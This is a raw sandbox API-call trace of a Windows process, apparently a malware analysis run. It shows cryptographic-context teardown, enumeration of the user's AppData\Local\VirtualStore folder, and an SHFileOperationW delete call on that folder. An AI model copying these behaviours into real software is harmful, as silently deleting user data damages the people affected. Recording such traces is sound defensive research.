[0205.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa8b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0205.189] CryptDestroyKey (hKey=0x9e1db8) returned 1 [0205.190] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.190] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.190] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0205.190] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.190] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0205.190] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.190] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.190] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0205.190] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0205.190] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0205.190] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0205.190] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0205.190] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0205.190] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.190] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.190] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0205.190] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.190] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0205.190] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0205.190] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.190] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.190] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.190] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.191] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0205.191] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.191] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0205.191] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.191] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.191] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0205.191] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.191] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0205.191] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.191] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.191] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.191] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.191] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.191] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.191] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.191] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.191] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.191] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.191] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.191] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.191] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.191] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.191] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.192] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0205.192] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.192] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0205.192] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.192] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.192] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0205.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0205.192] CryptReleaseContext (hProv=0xa7c550, dwFlags=0x0) returned 1 [0205.192] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.192] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.192] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.192] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.192] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.192] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.192] FreeLibrary (hLibModule=0x76390000) returned 1 [0205.192] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.192] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.192] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.192] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.192] CloseHandle (hObject=0x44c) returned 1 [0205.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.193] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.193] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.193] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.193] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/VirtualStore", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpFilePart=0x8cedf4*="VirtualStore") returned 0x2a [0205.194] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\virtualstore")) returned 0x10 [0205.194] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1eb8 [0205.194] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0205.195] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 0 [0205.195] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0205.195] GetLastError () returned 0x12 [0205.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0205.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0205.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0205.195] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0205.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0205.196] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0205.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa630 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0205.196] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0205.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0205.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0205.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0205.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0205.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0205.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0205.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0205.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0205.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0205.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0205.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0205.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0205.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0205.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0205.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0205.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0205.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0205.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0205.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0205.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5fa20 [0205.198] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/VirtualStore", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpFilePart=0x8cf650*="VirtualStore") returned 0x2a [0205.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fa20 | out: hHeap=0x2af0000) returned 1 [0205.198] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\virtualstore")) returned 0x10 [0205.198] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊